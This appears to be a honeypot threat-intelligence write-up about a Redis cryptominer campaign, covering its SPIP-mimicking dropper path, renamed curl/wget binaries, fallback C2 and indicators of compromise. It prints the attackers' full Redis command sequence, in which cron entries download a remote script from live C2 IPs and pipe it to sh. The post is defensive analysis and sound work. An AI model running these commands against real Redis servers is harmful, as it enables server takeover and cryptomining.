Redis is an in-memory key-value store widely used as an application cache and message queue. When a Redis instance is exposed to the public internet without authentication, an attacker can issue commands that write files into the host filesystem and schedule them to run as cron jobs. The end state is a fully compromised Linux server running a cryptocurrency miner. Trend Micro documented the pattern in 2020; it has been a stable cryptominer kill chain in the wild ever since.
On April 13 and 14, three different IPs in three different countries hit one of our Redis honeypots within thirty hours. Their command sequences were byte-for-byte identical: same twenty-five Redis commands in the same order, same dropper URL, same fallback C2, same typo’d binary names. One toolkit, fired from three locations.
The dropper URL is the interesting part. It looks at first glance like a benign request to a French CMS:
http://34.70.205.211/plugins-dist/safehtml/lang/font/kworkerThe first three path segments come from a real piece of CMS infrastructure. The last two are camouflage for a Linux miner. A SOC analyst grepping a request log for wget or curl would find this line. A SOC analyst scanning a list of paths and seeing /plugins-dist/safehtml/... might skip past it. The operator has been serving the same six-file kill chain from the same Google Cloud VM since at least January 25, 2026 — eighty days at the time of writing, no public takedown, no published analysis of the samples. We never fetched anything from their host. urlscan.io’s public scan history did the work.
What we observed
Each session opened with a Redis INFO probe, dumped the database, and then wrote a series of cron jobs into the in-memory keyspace before flushing them to disk via config set dir plus save. That is the well-documented Redis-to-crontab persistence pattern. Here is the exact form the operator chose:
info
COMMAND
config set dbfilename backup.db
save
config set stop-writes-on-bgsave-error no
flushall
set backup1 "*/2 * * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup2 "*/3 * * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup3 "*/4 * * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup4 "*/5 * * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
config set dir /var/spool/cron/
config set dbfilename root
config set dir /var/spool/cron/crontabs
set backup1 "*/2 * * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup2 "*/3 * * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup3 "*/4 * * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker | sh"
set backup4 "*/5 * * * * root wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
config set dir /etc/cron.d/
config set dbfilename javae
config set dir /etc/
config set dbfilename crontabThe other two sessions, 211.154.194.36 (China Unicom, Beijing) and 157.245.229.234 (DigitalOcean, US), issued the same commands in the same order. The cron jobs, the URLs, the dbfilename strings, the dir rotations: identical.
That makes this a single toolkit firing from at least three locations within a day and a half. We have four sensors and we recorded three sessions, so we can’t estimate how widely the toolkit is deployed. What we can do is follow the URL.
The dropper URL is wearing a costume
Pull the URL apart:
http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker
└────────────────────┬────────────────┘
│
borrowed from a real CMS, then extendedplugins-dist/safehtml/ is a real directory on every installation of SPIP, a French content management system used by thousands of news, education, and government sites. plugins-dist is where SPIP ships the plugins it bundles by default. safehtml is the bundled XSS sanitizer. Inside safehtml/ there is a real lang/ subdirectory holding language pack files. You can verify this yourself by visiting any open SPIP install. For example, vindetahiti.com/plugins-dist/safehtml/ shows the plugin directory listing exactly as it appears in the SPIP source repository.
Then the URL invents two segments: font/ and kworker. SPIP’s safehtml plugin has no font directory and no kworker file. The first three path segments are genuine CMS infrastructure. The last two are the payload, smuggled in.
The camouflage targets log review more than scanners. A log line that reads GET /plugins-dist/safehtml/lang/font/kworker looks, at a glance, like a CMS request. A SOC analyst grepping for wget and curl will find it. A SOC analyst scrolling past a list of HTTP requests on a server that hosts a real SPIP install, or has ever hosted one, might not.
The binary name is doing the same job at a different layer. kworker is what the Linux kernel calls its per-CPU worker threads. On a healthy box, ps auxf is full of [kworker/0:1], [kworker/u8:2], and so on. Calling your dropper kworker is a bet that whoever runs ps next will see it as a kernel thread and skip past it.
The staging tree
We never fetched anything from the operator’s host. Everything below came from urlscan.io’s public API: 91 historical scans against page.ip:34.70.205.211, each one preserving the HTTP response metadata that urlscan’s own sandbox recorded. Reading the scan results is how you analyze active malware infrastructure without touching it.
The /plugins-dist/safehtml/lang/font/ directory on the operator’s server holds six files, not one:
| File | Size | Content-Type | Role |
|---|---|---|---|
kworker | 36,273 B | text/plain | Shell script installer (the cron-fetched payload) |
cr.sh | 4,306 B | text/x-sh | Bootstrap shell script |
cb.txt | 4,421 B | text/plain | Config, plain text |
javae | 5,685,096 B | application/octet-stream | Compiled Linux binary (size consistent with the xmrig family) |
1.0.5.tar.gz | 351,866 B | application/x-gzip | Versioned archive |
pnscan-1.14.1.tar.gz | 74,429 B | application/x-gzip | Bundled parallel port scanner |
Two things snap into focus once you see the tree.
First, javae is not a random string. Look back at the Redis commands above and find the line config set dbfilename javae. The operator writes the RDB output on the victim with the same filename they use for the miner binary on the C2. It’s a naming convention, not a typo. When the cron-fetched kworker shell script eventually downloads the miner and drops it somewhere on disk, it knows where to look. This is the kind of consistency that shows up when a toolkit is authored once and reused everywhere.
Second, this is a wormable campaign, not just a miner drop. The pnscan-1.14.1.tar.gz entry is pnscan, a real open-source parallel port scanner written by Peter Eriksson. It has legitimate uses, but when a cryptominer installer ships pnscan alongside its payload, the purpose is propagation: the infected host gets the scanner, uses it to find the next unauth Redis instance on the internet, and delivers the same install chain there. Each victim becomes a scanner for the next victim. The three sessions we recorded may not be the operator running the campaign directly. Two of them, or all three, may be infected hosts that the campaign turned into propagators and pointed at one of our sensors by accident.
1.0.5.tar.gz is a versioned archive. We don’t know what it contains from urlscan metadata alone, but the presence of a version number ending in .5 at the patch level suggests an actively maintained component. Whoever wrote this is iterating.
Running since January
urlscan’s earliest scan of this infrastructure is cb.txt on 2026-01-25T21:34:23Z. The most recent is kworker on 2026-04-06T11:33:05Z. The same IP, the same URL path, the same filenames, for roughly 80 days.
Over those 80 days:
- 91 urlscan scans against the IP across all six files.
- urlscan’s ML engine flagged every file malicious at scores ranging from 21 (for
javae, the compiled binary) to 79 (for the two tarballs). - No public takedown from Google Cloud. The primary C2
34.70.205.211is a GCE VM inus-central1(Council Bluffs, Iowa), reverse DNS211.205.70.34.bc.googleusercontent.com. 80 days of public evidence on urlscan and the VM is still the live address in cron jobs reaching our honeypots as of this week. - No public analysis of the samples. We searched for all six SHA256 hashes across the indexed web: zero hits. No VirusTotal hits, no MalwareBazaar, no security vendor write-ups. This is a miner campaign running on a major cloud with a public-evidence trail and nobody has looked at the samples yet.
The operator also put real thought into the server: the HTTP response headers show Server: Apache/2.4.66 (Debian). That is a deliberately deployed Debian VM running a patched Apache, not an improvised Python http.server on a burn box. Somebody is maintaining this.
Two providers for redundancy
The cron jobs point to two distinct hosts:
| Role | IP | ASN | Provider | Location |
|---|---|---|---|---|
| Primary | 34.70.205.211 | AS396982 | Google Cloud | Council Bluffs, Iowa |
| Fallback | 38.150.0.118 | AS174 | Cogent Communications | Salt Lake City, Utah |
The interesting structural detail is where the fallback shows up. Four cron jobs in the first pass, all pointing at the GCP host. Then the operator switches to root-level cron (/var/spool/cron/crontabs, dbfilename root) and writes another four jobs. Three of them point at the GCP host. Only the third one, in the second pass, points at the Cogent host.
set backup3 "*/4 * * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker | sh"
^^^^^^^^^^^^^^
different hostOne cron job in eight, on the root crontab only, every four minutes. That is a deliberate low-volume fallback. The operator wants the GCP host to take all the traffic and wants at least one job, on at least one persistence target, fetching from somewhere else in case Google eventually takes the primary down. The dewfhuewr4r89/98hy67// path on the fallback even has a double slash, which is harmless to most HTTP servers but makes the URL visually distinct from the GCP one in a way that suggests the two were authored separately.
Two binaries that don’t exist (yet)
Look at the cron commands again and you’ll notice two of them call binaries that aren’t in any standard Linux distribution:
*/2 * * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
*/5 * * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | shcd1 -fsSL and wd1 -q -O-. The flags match curl and wget exactly. The binary names don’t.
These are placeholders. The intended sequence is:
- The cron job runs and tries
cd1. On a fresh box, that fails becausecd1doesn’t exist, but the second cron job (every three minutes) uses the realwget, and it succeeds. The dropper script runs. - The dropper script, among other things, moves
/usr/bin/curlto/usr/bin/cd1and/usr/bin/wgetto/usr/bin/wd1. - From that point on, all four cron jobs work, but now they’re calling
cd1andwd1. A defender runningauditdorfalcorules that watch forwget/curlexecution sees nothing. A defender grepping/etc/crontabforwgetfinds the two unrenamed jobs but misses the other two.
The technique isn’t novel. It’s been described in writeups going back to 2020 and reappears in 2025 reporting on cryptominer botnets. What’s worth seeing is the technique in the wild, written into a cron job that won’t actually work until the dropper has executed once. The cron jobs are designed to survive the dropper, not just trigger it.
What we can’t say
We have four sensors. We recorded three sessions over 30 hours. That’s enough to characterize the toolkit and, with urlscan’s public history, enough to characterize the operator’s staging infrastructure. It is not enough to characterize how widely the toolkit is deployed or how many hosts have been infected.
We did not fetch any of the files. Everything in the staging-tree table came from urlscan’s sandbox captures. We have sizes, content-types, HTTP statuses, and SHA256 hashes, but we have not read the contents. We can’t confirm javae is a cryptominer from the bytes alone (we’re inferring from the size range and the context), and we can’t link any of the samples to a named malware family without someone doing proper binary analysis from a sandbox. The hashes are public now. If a vendor reads this and uploads the samples to a real analysis pipeline, the write-up should be theirs.
We can’t attribute the toolkit to any named campaign. The cd1/wd1 rename is consistent with multiple reported cryptominer botnets, but the technique is shared across families. The specific combination of SPIP-mimicking paths + GCP staging + javae dbfilename naming + bundled pnscan + dual-provider C2 is a fingerprint, but it’s a fingerprint we observed, not a fingerprint we matched to a known operator.
What we can say: three different IPs in three different ASNs sent us the same byte sequence. The operator’s infrastructure has been running on Google Cloud for at least 80 days with zero public analysis and zero takedown. The staging directory contains a six-file kill chain including a propagator. The same operator is writing RDB filenames on victim hosts that match binary names on their own C2. If you run a Redis instance on a public IP, the lessons are the boring ones: bind to localhost, set requirepass, run with --protected-mode yes. If you run a SOC: a request to /plugins-dist/safehtml/lang/font/kworker on any host that isn’t actually running SPIP is worth a second look. So is any cron job that calls cd1 or wd1.
If you run a public cloud or GPU compute platform: the operator above used a Google Cloud VM as primary C2 for 80 days with a public-evidence trail and no takedown. Tenant abuse-handling latency is part of the threat model whether you instrument for it or not. urlscan’s public scan history is one of the few defender-side signals that crosses tenant boundaries; subscribing the abuse-response team to alerts on your own ASN serving malware-pattern paths is one of the cheapest tenant-side controls available.
Indicators of compromise
All of the below are observable without touching operator infrastructure. Hashes come from urlscan’s public scan record, IPs from our session corpus plus urlscan’s host records, and URL paths from the Redis command sequences we observed.
Hosts
34.70.205.211 (AS396982, Google Cloud, us-central1, primary C2)
38.150.0.118 (AS174, Cogent Communications, Salt Lake City, fallback C2)Source IPs observed delivering the payload to our sensor
43.249.251.28 (AS CORETEL NETWORKS INTERNATIONAL, Singapore)
211.154.194.36 (AS China Unicom Beijing, China)
157.245.229.234 (AS DigitalOcean, United States)URLs
http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker
http://34.70.205.211/plugins-dist/safehtml/lang/font/cr.sh
http://34.70.205.211/plugins-dist/safehtml/lang/font/cb.txt
http://34.70.205.211/plugins-dist/safehtml/lang/font/javae
http://34.70.205.211/plugins-dist/safehtml/lang/font/1.0.5.tar.gz
http://34.70.205.211/plugins-dist/safehtml/lang/font/pnscan-1.14.1.tar.gz
http://38.150.0.118/dewfhuewr4r89/98hy67//kworkerFile hashes (SHA256)
kworker 92a71778310bf37cf81c8f42a250ea7b9ed17042b577d90f5d179f90ac1c056a
cr.sh 72ec88c4f57ff222abe8a49809e149cb68daa1bbf77147b946f3e0cbfcf411ae
cb.txt 9041e709883ce89f6ce9dbf4aa147e577ef28ce0744d1a20705fbe5d878d9005
javae 1ff55eafdba615287f423eab3257ad24b070be1a6e63aa91f06d0ba16d001b60
1.0.5.tar.gz 16ac8c14e7c5d9b0e573f42125b2c41fa0627243a84fcf37fc1d166ab824b64e
pnscan-1.14.1.tar.gz d7c569900cd7cdcaafdc0de74de12cc44988f7ad76917b5a2c224aa9de5fc3f8Detection strings
config set dbfilename javae
config set dbfilename crontab
cd1 -fsSL (renamed curl)
wd1 -q -O- (renamed wget)
/plugins-dist/safehtml/lang/font/ (SPIP-mimicking dropper path)Server fingerprint
Server: Apache/2.4.66 (Debian)Acknowledgments
urlscan.io makes this kind of analysis tractable; every byte in the staging-tree section came from their public scan history without our infrastructure ever touching the operator’s host. Trend Micro (2020) and The Hacker News (2025) framed the cd1/wd1 binary-rename pattern across cryptominer families. The honeypot runs a fork of Beelzebub by Beelzebub.AI, extended for AI-targeted telemetry. The activity above was recorded against deception infrastructure; no real Redis instance was compromised.